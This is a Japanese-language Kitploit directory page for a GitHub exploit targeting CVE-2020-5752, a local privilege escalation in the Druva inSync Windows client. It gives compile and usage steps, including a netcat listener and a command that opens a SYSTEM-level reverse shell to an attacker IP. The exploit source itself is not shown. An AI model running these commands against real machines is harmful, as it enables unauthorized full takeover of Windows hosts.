Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2020-5752 — Druva向けローカル特権昇格 | Kitploit
ツール/GitHubGitHub/x0rbeexd/cve-2020-5752
特権昇格脆弱性分析エクスプロイトペネトレーションテスト学習と教育バイナリエクスプロイト
GitHubx0rbeexd/cve-2020-5752

CVE-2020-5752

Druva向けローカル特権昇格

リポジトリを見る
118ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2020-5752: Druva inSync ローカル特権昇格

**Druva inSync Windows Client(v6.6.3以下)**用のC言語ベースのエクスプロイトです。このアプリケーションはポート6064でRPCサービスを公開しており、パストラバーサルによるコマンドインジェクションに対して脆弱です。これにより、ローカルユーザーがNT AUTHORITY\SYSTEMとして任意のコマンドを実行できるようになります。

脆弱性の詳細

  • CVE: 2020-5752
  • テスト環境: Windows 10 (x64)
  • 権限レベル: ローカル特権昇格 (LPE)

使用方法

1. コンパイル

ソースコードをコンパイルするには、gcc(MinGW)を使用します:

root@kitploit:~
gcc exploit.c -o exploit.exe -lws2_32

2. 準備

SYSTEMアカウントがアクセス可能なディレクトリ(例:C:\Windows\Tasks\)にnc.exeのコピーを配置します。

3. 実行

攻撃側マシンでリスナーを起動します:

root@kitploit:~

nc -lvnp 4444
Run the exploit on the target Windows machine:
root@kitploit:~
exploit.exe <Attacker_IP> <Attacker_Port> <Path_to_NC>
例:
exploit.exe 10.10.10.5 4444 C:\Windows\Tasks\nc.exe

免責事項

このツールは教育目的のみで使用されます。許可なくテストするシステムでの不正使用は違法です。

ツールをダウンロード